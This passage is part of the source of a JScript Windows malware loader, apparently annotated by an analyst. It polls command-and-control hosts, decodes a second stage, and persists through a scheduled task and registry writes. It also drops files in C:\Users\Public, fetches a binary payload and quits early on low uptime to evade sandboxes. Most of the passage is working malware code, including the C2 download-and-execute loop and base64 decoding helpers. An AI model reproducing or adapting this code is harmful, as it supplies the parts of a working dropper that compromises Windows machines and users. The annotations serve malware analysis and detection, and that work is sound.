  // Main registration loop. Exits when uptime is <= 3000 seconds (GetUptime also returns 0 on WMI
  // failure, so that case exits too). Tries every host C2_FAIL_COUNT times, sleeping C2_REQUEST_SLEEP
  // seconds after each attempt; errors are swallowed. A response carrying the '<<<CLIENT__' marker is
  // base64-decoded, the answering host and the UID are written to the registry (ShimV4, SetupServiceKey),
  // and Persist is called.
  3613. Loader.DeployClient = function() {
  3614. if (Loader.Uptime <= 3000) {
  3615. WScript.Quit(0);
  3616. }
  3617.  
  3618. for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
  3619. for (var j = 0; j < config.PRIMARY_C2.length; j++) {
  3620. try {
  3621. var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
  3622. response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
  3623.  
  3624. if (response.indexOf('<<<CLIENT__') !== -1) {
  3625. var client = response.replace('<<<CLIENT__', '');
  3626. client = Base64text(client);
  3627.  
  3628. Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
  3629. Windows.RegWrite("SetupServiceKey", Loader.GetUid());
  3630.  
  3631. SELECTED_C2 = config.PRIMARY_C2[j];
  3632. Loader.Persist(client);
  3633. return;
  3634.  
  3635. }
  3636. } catch (e) {
  3637.  
  3638. }
  3639.  
  3640. WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
  3641. }
  3642. }
  3643. }
  3644.  
  // Persistence and staging: registers a scheduled task that runs every 6 minutes, stores the decoded
  // second stage (ServerUrl) and a copy of this script's own source (WebLib32) in the registry, drops
  // the decoy .ini and the stage-2 .js into C:\Users\Public, then fetches the binary payload via DeployHost.
  3645. Loader.Persist = function(client){
  3646.  
  3647. var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  3648. var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  3649.  
  3650. Windows.Execute(taskCommand);
  3651. Windows.RegWrite("ServerUrl", client);
  3652. Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  3653.  
  3654. Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  3655.  
  3656. Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
  3657.  
  3658. Loader.DeployHost();
  3659. }
  3660.  
// Displays `message` in a Popup on the object registered as 'MAIN_SH_OBJECT'.
// ObjectProducer.GetInstance is outside this view; presumably it hands back a
// cached WScript.Shell instance (Popup is a WScript.Shell method).
function debug(message){
ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
}
  3664.  
  3665.  
// Decodes a base64 string and returns the decoded bytes re-read as UTF-8 text.
// Uses the MSXML bin.Base64 nodeTypedValue trick for the decode and an ADODB.Stream
// for the byte-to-text conversion -- both classic living-off-the-land JScript idioms
// worth flagging in script-block / AMSI telemetry.
function Base64text(string){
var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
var element = XmlDOM.createElement("tempContainer");
// With dataType = bin.Base64, nodeTypedValue exposes the decoded byte array.
element.dataType = "bin.Base64";
element.text = string;

var stream = WScript.CreateObject("ADODB.Stream");
stream.Type = 1; // adTypeBinary
stream.Open();
stream.Write(element.nodeTypedValue);

// Rewind and switch to text mode so the same buffer is read back as UTF-8.
stream.Position = 0;
stream.Type = 2; // adTypeText
stream.CharSet = "utf-8";

// The stream is never closed; it relies on COM release when it goes out of scope.
return stream.ReadText();
}
  3683.  
// Converts a string to a binary byte array via ADODB.Stream, writing it with the
// "ascii" charset -- characters outside ASCII will not round-trip through this.
function StringToBinary(string){
var BinaryStream = new ActiveXObject("ADODB.Stream");
BinaryStream.Type = 2; // adTypeText
BinaryStream.CharSet = "ascii";
BinaryStream.Open();
BinaryStream.WriteText(string);
// Rewind, flip to binary mode and read the whole buffer back as bytes.
// (Changing Type resets the position, hence the second Position = 0.)
BinaryStream.Position = 0;
BinaryStream.Type = 1; // adTypeBinary
BinaryStream.Position = 0;
return BinaryStream.Read();
}
  3695.  
  3696.  
// Decodes a base64 string and returns an open, binary-mode ADODB.Stream holding the
// bytes. Unlike Base64text, Position is NOT rewound before returning, so the
// consumer (Windows.WriteBytes, outside this view) presumably seeks to 0 itself.
function Base64bytes(string){
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
// bin.base64 makes nodeTypedValue yield the decoded byte array.
element.dataType = "bin.base64";

element.text = string;

var stream = WScript.CreateObject("ADODB.Stream");
stream.Type = 1; // adTypeBinary
stream.Open();

stream.Write(element.nodeTypedValue);
// Returned open and un-rewound; closing is left to the caller.
return stream;
}
  3711.  
// Base64-encodes a string (as ASCII bytes, see StringToBinary) via the MSXML
// bin.base64 element, then strips the line breaks MSXML inserts into long output.
// NOTE(review): the second replace also deletes every literal "//" from the base64
// text, which corrupts any encoding that happens to contain two adjacent '/'
// characters -- the server-side decoder presumably expects or tolerates this quirk.
function Base64Encode(string) {

var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";

// Assigning the byte array to nodeTypedValue makes .text yield the base64 form.
element.nodeTypedValue = StringToBinary(string);

return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}
  3722.  
  3723.  
// Entry guard: the C2 poll only auto-runs when CLIENT_IMPORT_ENV is undefined,
// i.e. when this file executes on its own as the dropper. Loader.Persist stores
// this same source in the registry (WebLib32); presumably a stage that eval()s
// that copy predefines CLIENT_IMPORT_ENV so it imports the definitions above
// without re-triggering deployment -- confirm against the consuming stage.
if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
Loader.DeployClient();
}